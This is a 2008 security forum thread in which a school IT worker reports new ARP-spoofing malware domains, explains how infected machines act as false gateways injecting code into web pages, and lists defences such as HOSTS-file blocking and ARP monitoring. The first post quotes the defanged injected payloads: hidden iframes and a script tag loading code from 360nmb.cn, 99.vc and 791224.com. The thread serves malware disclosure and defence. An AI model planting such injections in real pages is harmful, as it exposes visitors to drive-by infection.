| View previous topic :: View next topic |
| Author |
Message |
reportingFromChina
Trooper
Joined: Sep 26, 2007
Posts: 20
Location: China
|
 Posted: Mon Apr 21, 2008 11:12 am Post subject: New ARP spoofing malware domains - 360nmb.cn and 99.vc |
|
|
The latest ARP spoofing viruses have hit the
school I work at here. The domains, and the malicious junk they
insert into pages routed via infected "false" gateways are
respectively:
<iframe src=hxxp://x.360nmb.cn/ width=0 height=0 frameborder=0></iframe>
and
<script src=hxxp://al.99.vc/1.js></script>
Furthermore, the previously reported domain 791224.com is
being accessed by a slightly different URL than before:
<iframe src=hxxp://z.791224.com/ width=0 height=0 frameborder=0></iframe>
(I reported 791224.com in late February, just before your server crash,
so that posting was lost. However it was posted to the listserv).
I don't know whether the malware being served up from the new domains has any new tricks up its sleeve, but I suspect it may as it's lead to a rash of new infections just as we'd got the school 100% clean.
Here's a quick redux on how these viruses work, and strategies for dealing with them. This stuff is kind of scattered across my previous posts, so I think it's useful to put it in one list:
*An infected machine sends out fake ARP packets, which fool other machines on your network into connecting to the Internet via the infected machine.
*The infected machine acts as a proxy server, but inserts malicious code (e.g. above) into pages retrieved from certain, high value sites (e.g. Bank Of China, but not Google).
*As long as just one machine on your network is infected, your access to the internet will be affected (and you'll be vulnerable to infection).
*My experience has been that Firefox is far less vulnerable to
the malicious code inserted by the false gateway.
*You can protect yourself 100% from infection from known domains by editing your HOSTS file to make the known malware domains resolve to your loopback adapter. See this previous post for how:
 /modules.php?&name=Forums&file=viewtopic&t=212462
*Even if your machine is not itself infected, be aware that unencrypted traffic can be snooped by the "false" gateway.
*WinArpWatch is a useful tool for alerting you to ARP spoofing attacks on your network. You can get it via CastleCops' list of useful tools:
http://wiki.castlecops.com/Lists_of_freeware_analysis_tools#ARP_watch
RFC
|
|
| Back to top |
|
 |
tetak
MIRT Team Lead
Premium Member
Joined: Jan 19, 2007
Posts: 5879
|
| Posted: Tue Apr 22, 2008 11:08 am Post subject: |
|
|
I've added the 2 exploits, 14.htm + real.htm to the malware listserv.
The file arp.exe was detected by most AV companies.
I'll have a look at 1.js
_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.
Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
|
|
| Back to top |
|
|
ErikAlbert
Warnings : 3
Captain
Joined: Jan 20, 2005
Posts: 424
|
| Posted: Thu May 01, 2008 3:01 pm Post subject: |
|
|
| tetak wrote: |
The file arp.exe was detected by most AV companies.
|
Perhaps I misunderstand but the link pointed to by reporterfromchina does not have a arp.exe file.
|
|
| Back to top |
|
|
tetak
MIRT Team Lead
Premium Member
Joined: Jan 19, 2007
Posts: 5879
|
|
| Back to top |
|
|
|
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
